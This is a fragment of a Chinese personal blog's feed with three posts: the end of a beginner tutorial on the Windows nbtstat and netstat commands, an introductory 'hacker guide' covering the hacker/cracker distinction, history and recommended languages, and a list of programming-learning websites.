src="https://s2.loli.net/2022/01/03/YUm39nyVqKv1N2c.jpg" alt="v2-96c2c26eb998d8549840d758fb79124f_720w.jpg" style="zoom:50%;" /><h1 id="2-nbtstat"><a href="#2-nbtstat" class="headerlink" title="2.nbtstat"></a>2.nbtstat</h1><p> <strong>显示统计数据命令</strong></p><p>该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接，使用这个命令你可以得到远程主机的NETBIOS信息，比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。</p><p><strong>-a</strong> 使用这个参数，只要你知道了远程主机的机器名称，就可以得到它的NETBIOS信息（下同）。 　</p><p>-a这个参数也可以得到远程主机的NETBIOS信息，但需要你知道它的IP。</p><p><strong>-n</strong> 列出本地机器的NETBIOS信息。 　</p><h1 id="3-netstat"><a href="#3-netstat" class="headerlink" title="3.netstat"></a>3.<strong>netstat</strong></h1><blockquote><p>这是一个用来查看网络状态的命令，操作简便功能强大。　</p></blockquote><p>-a 查看本地机器的所有开放端口，可以有效发现和预防木马，可以知道机器所开的服务等信息</p><p>这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法：netstat -a IP。  </p><p>-r 列出当前的路由信息，告诉我们本地机器的网关、子网掩码等信息。用法：netstat -r IP。</p><p>正在更新ing…</p><h1 id="文献参考："><a href="#文献参考：" class="headerlink" title="文献参考："></a>文献参考：</h1><p><a href="https://zhuanlan.zhihu.com/p/59498577">https://zhuanlan.zhihu.com/p/59498577</a></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;导言&quot;&gt;&lt;a href=&quot;#导言&quot; class=&quot;headerlink&quot; title=&quot;导言&quot;&gt;&lt;/a&gt;导言&lt;/h1&gt;&lt;p&gt;刚入门的黑客，都&lt;strong&gt;必须&lt;/strong&gt;要学会cmd，而cmd并不难理解，只是背诵记忆的较多，学习cmd可以为以后入侵、拿权限</summary>
      
    
    
    
    <category term="攻防" scheme="http://example.com/categories/%E6%94%BB%E9%98%B2/"/>
    
    
    <category term="黑客" scheme="http://example.com/tags/%E9%BB%91%E5%AE%A2/"/>
    
  </entry>
  
  <entry>
    <title>黑客从入门到入狱指南</title>
    <link href="http://example.com/2022/01/02/%E9%BB%91%E5%AE%A2%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%85%A5%E7%8B%B1%E6%8C%87%E5%8D%97/"/>
    <id>http://example.com/2022/01/02/%E9%BB%91%E5%AE%A2%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%85%A5%E7%8B%B1%E6%8C%87%E5%8D%97/</id>
    <published>2022-01-02T04:56:26.000Z</published>
    <updated>2022-01-03T12:13:41.748Z</updated>
    
    <content type="html"><![CDATA[<h1 id="0-1-认识"><a href="#0-1-认识" class="headerlink" title="0.1 认识"></a>0.1 认识</h1><p>很多人并不了解黑客是什么，而是将黑客与骇客混为一谈，实际上:</p><blockquote><p>黑客:最早源自英文hacker，早期在美国的电脑界是带有褒义的。他们都是水平高超的电脑专家，尤其是程序设计人员，算是一个统称。</p></blockquote><blockquote><p>“骇客”也可以指：在信息安全里，“骇客”指研究智取计算机安全系统的人员。利用公共通讯网路，如互联网和电话系统，在未经许可的情况下，载入对方系统的被称为黑帽骇客</p></blockquote><p>白帽子主要以“防”为主，而黑帽子主要以“攻”为主，不论是黑帽还是白帽，都要先学会攻击。</p><blockquote><p>焉知攻，怎知防？ </p></blockquote><h1 id="0-2发展史"><a href="#0-2发展史" class="headerlink" title="0.2发展史"></a>0.2发展史</h1><blockquote><p>黑客最早始于20 世纪50年代，最早的计算机1946年在宾夕法尼亚大学出现，而最早的黑客出现于麻省理工学院，贝尔实验室也有。最初的黑客一般都是一些高级的技术人员，他们热衷于挑战、崇尚自由并主张信息的共享。<br>1994年以来，因特网在全球的迅猛发展为人们提供了方便、自由和无限的财富，政治、军事、经济、科技、教育、文化等各个方面都越来越网络化，并且逐渐成为人们生活、娱乐的一部分。可以说，信息时代已经到来，信息已成为物质和能量以外维持人类社会的第三资源，它是未来生活中的重要介质。随着计算机的普及和因特网技术的迅速发展，黑客也随之出现了。</p></blockquote><blockquote><p>黑客”一词由英语Hacker英译而来，是指专门研究、发现计算机和网络漏洞的计算机爱好者。他们伴随着计算机和网络的发展而产生成长。黑客对计算机有着狂热的兴趣和执着的追求，他们不断地研究计算机和网络知识，发现计算机和网络中存在的漏洞，喜欢挑战高难度的网络系统并从中找到漏洞，然后向管理员提出解决和修补漏洞的方法。<br>黑客不干涉政治，不受政治利用，他们的出现推动了计算机和网络的发展与完善。黑客所做的不是恶意破坏，他们是一群纵横驰骋于网络上的大侠，追求共享、免费，提倡自由、平等。黑客的存在是由于计算机技术的不健全，从某种意义上来讲，计算机的安全需要更多黑客去维护。<br>但是到了今天，黑客一词已被用于泛指那些专门利用计算机搞破坏或恶作剧的家伙，对这些人的正确英文叫法是Cracker，有人也翻译成“骇客”或是“<strong>者”，也正是由于</strong>者的出现玷污了黑客的声誉，使人们把黑客和**者混为一谈，黑客被人们认为是在网上到处搞破坏的人。<br>一个黑客即使从意识和技术水平上已达到黑客水平，也决对不会声称自己是一名黑客，因为黑客只有公认的，没有自封的，他们重视技术，更重视思想和品质！</p><p><del>当然，想装逼也可以，但要有真正的技术</del></p></blockquote><h1 id="0-3-需要什么"><a href="#0-3-需要什么" class="headerlink" title="0.3 需要什么"></a>0.3 需要什么</h1><p>很多人都梦想当黑客，但实际上，在互联网安全这条道路上，本无对错，评判的人多了，仿佛有了…</p><p>不论你是为了自己还是他人，如果你认为你是一名黑客，那么<strong>一定</strong>要有一下几点：  </p><ul><li>对算法、程序的痴迷：看到数字、字符会有种亲切感</li><li>时刻想着自己只是技术领域大海中的一滴水：即便自己有实力，也最好要保留，真正的黑客不只是会追求功名</li><li>有恒心：大家都知道，黑客所需学习的知识远远大于普通的程序员，如果没有将其当作终生爱好，最好就不要学，因为很难坚持</li><li>耐下心来，多思考，勤查资料：很多时候我们单凭一己之力很难攻克难题，这个时候可以借助任何工具，要努力突破瓶颈</li></ul><h1 id="0-4-推荐语言"><a href="#0-4-推荐语言" class="headerlink" title="0.4 推荐语言"></a>0.4 推荐语言</h1><p><strong>python</strong>       </p><p>**java **      </p><p><strong>php</strong>               </p><p><strong>asp</strong>   </p><p><strong>html/css/javascript</strong></p><p>如果有能力，最好还要学精通<strong>c/c++</strong></p><h1 id="1-0-DAY1-cmd指令"><a href="#1-0-DAY1-cmd指令" class="headerlink" title="1.0 DAY1 cmd指令"></a>1.0 DAY1 cmd指令</h1><blockquote></blockquote><h1 id="2-0-DAY02-黑客术语"><a href="#2-0-DAY02-黑客术语" class="headerlink" title="2.0 DAY02 黑客术语"></a>2.0 DAY02 黑客术语</h1><blockquote></blockquote><p><marquee>每周都会更新，尽请期待</marquee></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;0-1-认识&quot;&gt;&lt;a href=&quot;#0-1-认识&quot; class=&quot;headerlink&quot; title=&quot;0.1 认识&quot;&gt;&lt;/a&gt;0.1 认识&lt;/h1&gt;&lt;p&gt;很多人并不了解黑客是什么，而是将黑客与骇客混为一谈，实际上:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;黑客:</summary>
      
    
    
    
    <category term="攻防" scheme="http://example.com/categories/%E6%94%BB%E9%98%B2/"/>
    
    
    <category term="黑客" scheme="http://example.com/tags/%E9%BB%91%E5%AE%A2/"/>
    
  </entry>
  
  <entry>
    <title>编程网站自学推荐</title>
    <link href="http://example.com/2021/10/10/%E7%BC%96%E7%A8%8B%E7%BD%91%E7%AB%99%E8%87%AA%E5%AD%A6%E6%8E%A8%E8%8D%90/"/>
    <id>http://example.com/2021/10/10/%E7%BC%96%E7%A8%8B%E7%BD%91%E7%AB%99%E8%87%AA%E5%AD%A6%E6%8E%A8%E8%8D%90/</id>
    <published>2021-10-10T12:34:50.000Z</published>
    <updated>2021-10-10T12:42:05.943Z</updated>
    
    <content type="html"><![CDATA[<hr><p>title: hello<br>date: 2021-10-07 21:01:43<br>tags:</p><hr><hr><p>title: 学习编程十大优质网站推荐<br>date: 2021-10-05 17:20:04<br>tags:教程、技巧</p><hr><h2 id="本期分享给大家十个我日常中觉得不错的优质网站"><a href="#本期分享给大家十个我日常中觉得不错的优质网站" class="headerlink" title="本期分享给大家十个我日常中觉得不错的优质网站"></a>本期分享给大家十个我日常中觉得不错的优质网站</h2><p>目录：<br>1.CSDN<br>2.博客园<br>3.github<br>4.菜鸟教程<br>5.B站<br>6.开源中国<br>7.黑基网<br>8.掘金<br>9.lintcode<br>10.<del>本站</del></p><hr><h3 id="1-CSDN"><a href="#1-CSDN" class="headerlink" title="1.CSDN"></a>1.CSDN</h3><p>说起CSDN应该很多人都很熟悉，它是蒋涛创立的“中国程序员大本营”<br><img src="https://i.loli.net/2021/10/05/EMdnYlOyxawbGcq.png" alt="2345截图20211005173440.png"><br>里面有很多优质栏目，<br>平时我遇到不懂的东西会从里面查找答案<br><a href="https://www.csdn.net/">csdn传送门</a></p><span id="more"></span><hr><h3 id="2-博客园"><a href="#2-博客园" class="headerlink" title="2.博客园"></a>2.博客园</h3><p>博客园里的博客数不胜数，论技术就看这个网站，比较全面<br><img src="https://i.loli.net/2021/10/05/ybVOlSmCnqHG3rD.png" alt="2345截图20211005173847.png"><br>UI界面也比较好看<br><a href="https://www.cnblogs.com/">博客园传送门</a></p><hr><h3 id="3-github"><a href="#3-github" class="headerlink" title="3.github"></a>3.github</h3><p>这个网站不用我多说，全球最大开源平台，托管git，功能十分强大<br><del>就是经常访问不进去，有时要配置映射文件</del></p><p><img src="https://i.loli.net/2021/10/05/rtPVp7nDiQa4vWL.png" alt="2345截图20211005174155.png"><br>我的这个网站也是在github上申请的<br><a href="http://github.com/">http://github.com</a></p><hr><h3 id="4-菜鸟教程"><a href="#4-菜鸟教程" class="headerlink" title="4.菜鸟教程"></a>4.菜鸟教程</h3><p><strong>力推！！！</strong><del>不止我一个人觉得这不是给菜鸟看的</del><br>里面覆盖了百分之九十你想学的编程语言及计算机知识<br><img src="https://i.loli.net/2021/10/05/USxIzYlTuw1tXiR.png" alt="2345截图20211005174515.png"><br><a href="http://runoob.com/">http://runoob.com</a></p><hr><h3 id="5-b站（bilibili）"><a href="#5-b站（bilibili）" class="headerlink" title="5.b站（bilibili）"></a>5.b站（bilibili）</h3><p>这个不多说，休闲学习兼备<br><img src="https://i.loli.net/2021/10/05/hzVxjn7oFJQmCIi.png" alt="2345截图20211005174628.png"><br><a href="http://bilibili.com/">http://bilibili.com</a></p><hr><h3 id="6-开源中国（oschina）"><a href="#6-开源中国（oschina）" class="headerlink" title="6.开源中国（oschina）"></a>6.开源中国（oschina）</h3><p><strong>技术应有尽有</strong><br><img src="https://i.loli.net/2021/10/05/gzqJNOFwECSAQVk.png" alt="2345截图20211005174814.png"><br><a href="http://oschina.net/">http://oschina.net</a></p><hr><p>###7.黑基网<br><strong>学习安全攻防，做一个正直的白帽黑客</strong><br><img src="https://i.loli.net/2021/10/05/SWrZns5vjMa8BVe.png" alt="2345截图20211005174956.png"><br><a href="http://hackbase.net/">http://hackbase.net</a></p><hr><h3 id="8-掘金"><a href="#8-掘金" class="headerlink" title="8.掘金"></a>8.掘金</h3><p><strong>又是一个干净漂亮的好网站</strong><br><img src="https://i.loli.net/2021/10/05/GFjoITtvS9DR41P.png" alt="2345截图20211005175111.png"><br><a href="http://juejin.cn/">http://juejin.cn</a></p><hr><h3 id="9-linkcode"><a href="#9-linkcode" class="headerlink" title="9.linkcode"></a>9.linkcode</h3><p><strong>算法爱好者的天堂</strong><br><img src="https://i.loli.net/2021/10/05/iGocsHP74AkMlO3.png" alt="2345截图20211005175217.png"><br><a href="https://www.lintcode.com/">https://www.lintcode.com/</a></p><hr><h3 id="10-小破站（本站）"><a href="#10-小破站（本站）" class="headerlink" title="10.小破站（本站）"></a>10.小破站（本站）</h3><p><strong>希望大家多多支持本站，下期再见哦qwq</strong></p>]]></content>
    
    
    <summary type="html">&lt;hr&gt;
&lt;p&gt;title: hello&lt;br&gt;date: 2021-10-07 21:01:43&lt;br&gt;tags:&lt;/p&gt;
&lt;hr&gt;
&lt;hr&gt;
&lt;p&gt;title: 学习编程十大优质网站推荐&lt;br&gt;date: 2021-10-05 17:20:04&lt;br&gt;tags:教程、技巧&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id=&quot;本期分享给大家十个我日常中觉得不错的优质网站&quot;&gt;&lt;a href=&quot;#本期分享给大家十个我日常中觉得不错的优质网站&quot; class=&quot;headerlink&quot; title=&quot;本期分享给大家十个我日常中觉得不错的优质网站&quot;&gt;&lt;/a&gt;本期分享给大家十个我日常中觉得不错的优质网站&lt;/h2&gt;&lt;p&gt;目录：&lt;br&gt;1.CSDN&lt;br&gt;2.博客园&lt;br&gt;3.github&lt;br&gt;4.菜鸟教程&lt;br&gt;5.B站&lt;br&gt;6.开源中国&lt;br&gt;7.黑基网&lt;br&gt;8.掘金&lt;br&gt;9.lintcode&lt;br&gt;10.&lt;del&gt;本站&lt;/del&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id=&quot;1-CSDN&quot;&gt;&lt;a href=&quot;#1-CSDN&quot; class=&quot;headerlink&quot; title=&quot;1.CSDN&quot;&gt;&lt;/a&gt;1.CSDN&lt;/h3&gt;&lt;p&gt;说起CSDN应该很多人都很熟悉，它是蒋涛创立的“中国程序员大本营”&lt;br&gt;&lt;img src=&quot;https://i.loli.net/2021/10/05/EMdnYlOyxawbGcq.png&quot; alt=&quot;2345截图20211005173440.png&quot;&gt;&lt;br&gt;里面有很多优质栏目，&lt;br&gt;平时我遇到不懂的东西会从里面查找答案&lt;br&gt;&lt;a href=&quot;https://www.csdn.net/&quot;&gt;csdn传送门&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
  </entry>
  
</feed>
